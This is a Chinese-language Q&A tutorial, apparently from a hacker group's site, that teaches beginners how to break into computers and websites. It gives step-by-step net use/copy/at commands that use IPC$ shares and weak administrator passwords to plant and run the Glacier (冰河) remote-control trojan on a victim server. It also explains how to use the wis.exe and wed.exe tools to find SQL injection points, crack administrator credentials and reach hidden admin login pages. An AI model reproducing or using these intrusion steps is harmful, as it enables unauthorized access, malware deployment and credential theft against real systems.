文章来源:第八军团

问:什么常见命令啊,什么工具啊,如何入侵,我还不会啊,能简单通俗的讲解一下吗?

答:一般的初步入侵可以分为三步:
1,扫描目标主机并分析扫描信息。 比如 探测开放的端口,获得服务软件及版本, 探测漏洞等等
2,利用漏洞。探测并获取帐号或密码系统
3,获得权限,进行操作。
不要太专业,太深入,太冗长,仅仅举个两个实际例子,不涉及任何高深知识,从工具角度来讲,但从中可以看出入侵的一般步骤:
一,入侵单机---普通攻击 4个工具: 1,shed.exe 2,流光2000 3,cmd.exe 4,冰河8.4
操作系统:winnt系统。
“shed.exe”:其实就是用来网上查共享资源的,速度快,可以查到很多服务断的共享文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.
“流光”:一些作网站和网吧服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,权限不够!有些需要密码。遇到密码怎办?用流光! 用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,便可以抓到肉鸡了。
使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? 执行cmd.exe 使用net命令具体操作如下:
第一步:net use \\ip\ipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \\210.*.*.*\ipc$ “juntuan” /user:"juntuan"
第二步:copy g-server.exe \\ip\admin$\system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。最好用最新的木马!哈哈,荷马以及教主还有很多人他们到处卖马呢,晕死......
第三步:net time \\ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的服务器时间为准。
第四步:at \\ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \\210.*.*.* 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。

二,入侵网站----SQL注入攻击
工具:榕哥的SQL注入攻击工具包,在榕哥的站点http://www.netxeyes.com/main.html可以下载。 下载来的这个工具包中总有两个小程序:“wed.exe”和“wis.exe”,其中“wis.exe”是用来扫描某个站点中是否存在SQL注入漏洞的;“wed.exe”则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。
1、寻找SQL注入点
  “wis.exe”使用的格式如下:“wis.exe 网址”,:首先打开命令提示窗口,比如输入如下命令:“wis.exe http://www.juntuan.cn/”。在输入网址时,前面的“http://”和最后面的“/”是必不可少的,否则将会提示无法进行扫描。 输入完毕后回车,即可开始进行扫描了。很快得到了扫描结果,可以看到某些网站中存在着很多SQL注入漏洞,我们随便挑其中一个来做试验。现在来对它进行SQL注入,破解出管理员的帐号来吧!
2、SQL注入破解管理员帐号
  现在进入命令窗口中,使用刚才下载的工具包中的“wed.exe”程序,命令使用格式为:“wed.exe 网址”输入如下命令:“wed.exe 页面地址”。回车后可看到命令运行情况。:这次输入网址时,最后面千万不要加上那个“/”,但前面的“http://”头也还是必不可少的。
  可以看到程序自动打开了工具包中的几个文件,“C:\wed\wed\TableName.dic”、“C:\wed\wed\UserField.dic”和“C:\wed\wed\PassField.dic”,这几个文件分别是用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件,不过想想小榕哥以前出的“黑客字典”那么的强大,还用得着去多此一举吗?
  在破解过程中还可以看到“SQL Injection Detected.”的字符串字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名。
  开始等待,很快就获得了数据库表名,然后得到用户表名和字长;再检测到密码表名和字长。然后“wed.exe”程序进行用户名和密码的破解。很快的,就得到了用户名和密码了。
3、搜索隐藏的管理登录页面
  拿到了管理员的帐号,现在看来我们只有找到管理员登录管理的入口才行了。一般在网页上找遍了也没有看到什么管理员的入口链接,可以使用“wis.exe”程序,这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面。
 管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入“wis.exe http://www.juntuan.cn/ /a”,对整个网站进行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描,在扫描过程中,找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了,在最后以列表显示在命令窗口中。
  在浏览器中输入网址,出现了本来隐藏着的管理员登录页面。输入用户名和密码,就进入到后台管理系统。